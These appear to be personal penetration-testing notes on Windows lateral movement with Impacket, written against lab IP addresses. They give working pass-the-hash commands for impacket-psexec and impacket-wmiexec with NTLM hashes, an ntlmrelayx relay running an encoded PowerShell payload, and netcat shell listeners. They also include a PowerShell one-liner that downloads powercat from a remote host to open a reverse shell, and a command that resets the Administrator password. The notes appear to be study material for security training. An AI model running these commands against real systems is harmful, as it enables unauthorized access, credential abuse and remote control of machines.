# Attacks
- [[MySQL]]

- #### Cracking NTLM [[Impacket]]
- psexec.py
- wmiexec.py
- Using psexec.py
	- searches for a writable share and uploads an executable file to it. Then registers exe as Windows service & starts
- Using impacket-scripts to execute psexec.py
		- user friendly
		- upload .exe
		- leaves logs
	- impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
		- -hashes = hash
			- format = "LMHash:NTHash"
			- since we only use NTLM hash
				- fill LMHash section with (32) 0's
			- then username@ip
			- then command to execute
				- default or blank = cmd.exe
		- shell is always a SYSTEM user
- impacket-wmiexec
	- doesnt write to disk
	- can be used with pth-wmis for remote acces
	- ```
		impacket-wmiexec -hashes 00000000000000000000000000000000: 2a944a58d4ffa77137b2c587e6ed7626 maria@192.168.210.70
		``
#### Set up SMB relay server
- [[Responder]]
### Relaying Net-NTLMv2
- - If not a local Admin user, UAC must be disabled

- impacket-ntlmrelayx
	- impacket library
	- sets up an SMB server and relays the authentification part
	- Example:
		- impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG5...."
			- --no-http-server = disable HTTP server since we're relaying SMB connection
			- -t = target
			- -c = command to execute
			- -enc = base64 encoded
			- [-i] = [interactive mode]
		- nc -lvnp 8080
			- catch reverse shell on SYS2
		- nc 192.168.50.211 5555
			- connect to bind shell on SYS1
		- dir \\192.168.119.2\test
			- create SMB connection to Kali machine
		- powershell reverse shell one liner
			- powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.145.245:8000/powercat.ps1');
powercat -c 192.168.45.245 -p 4444 -e powershell"

- or 
	- -c "net user Administrator Password123#"
